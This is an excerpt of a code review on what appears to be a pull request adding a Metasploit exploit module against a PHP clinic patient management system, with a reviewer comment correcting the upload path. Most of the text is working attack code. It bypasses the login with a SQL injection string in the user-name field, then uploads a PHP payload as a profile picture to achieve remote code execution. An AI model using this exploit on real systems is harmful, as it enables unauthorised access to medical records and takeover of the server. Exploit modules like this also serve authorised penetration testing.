modules/exploits/multi/http/clinic_pms_sqli_to_rce.rb

```diff
@@ -0,0 +1,197 @@
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path to the Clinic Patient Management System', '/pms']),
+      OptBool.new('DELETE_FILES', [true, 'Delete uploaded files after exploitation', true])
+    ])
+  end
+
+  def check
+    print_status('Checking if target is vulnerable...')
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path),
+      'method' => 'GET'
+    })
+
+    return Exploit::CheckCode::Unknown('Unexpected response code from server') unless res&.code == 200
+    return Exploit::CheckCode::Unknown('Unexpected content of body') if res.body&.blank?
+    return Exploit::CheckCode::Safe('Clinic PMS not detected') unless res.body.include?("Clinic's Patient Management System in PHP")
+
+    return Exploit::CheckCode::Appears('Clinic PMS detected')
+  end
+
+  def login_sqli
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'index.php'),
+      'method' => 'POST',
+      'keep_cookies' => true,
+      'vars_post' =>
+      {
+        user_name: "' or '1'='1' LIMIT 1;--",
+        password: '',
+        login: ''
+      }
+    })
+
+    fail_with Failure::UnexpectedReply, 'Unexpected response code' unless res&.code == 302
+    fail_with Failure::NotVulnerable, 'Application might be patched' unless res.headers&.key?('location')
+
+    fail_with Failure::Unknown, 'Unknown error happened' unless res.headers['location'] == 'dashboard.php'
+    print_status('Logged using SQL injection..')
+  end
+
+  def upload_payload
+    username = Rex::Text.rand_text_alphanumeric(8)
+    password = Rex::Text.rand_text_alphanumeric(8)
+    filename = Rex::Text.rand_text_alphanumeric(8) + '.php'
+
+    boundary = "----WebKitFormBoundary#{rand_text_alphanumeric(16)}"
+
+    data_post = "--#{boundary}\r\n"
+    data_post << "Content-Disposition: form-data; name=\"hidden_id\"\r\n\r\n"
+    data_post << "1\r\n"
+    data_post << "--#{boundary}\r\n"
+
+    data_post << "Content-Disposition: form-data; name=\"display_name\"\r\n\r\n"
+    data_post << "#{username}\r\n"
+    data_post << "--#{boundary}\r\n"
+
+    data_post << "Content-Disposition: form-data; name=\"username\"\r\n\r\n"
+    data_post << "#{username}\r\n"
+    data_post << "--#{boundary}\r\n"
+
+    data_post << "Content-Disposition: form-data; name=\"password\"\r\n\r\n"
+    data_post << "#{password}\r\n"
+    data_post << "--#{boundary}\r\n"
+
+    data_post << "Content-Disposition: form-data; name=\"profile_picture\"; filename=\"#{filename}\"\r\n"
+    data_post << "Content-Type: application/x-php\r\n\r\n"
+    data_post << "#{payload.encoded}\r\n"
+    data_post << "--#{boundary}\r\n"
+
+    data_post << "Content-Disposition: form-data; name=\"save_user\"\r\n\r\n"
+    data_post << "\r\n"
+    data_post << "--#{boundary}--\r\n"
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, '/pms/update_user.php'),
```

Comment:
I think this need to be removed 
```suggestion
      'uri' => normalize_uri(target_uri.path, '/update_user.php'),
```

Reply:
Yep, good points thanks!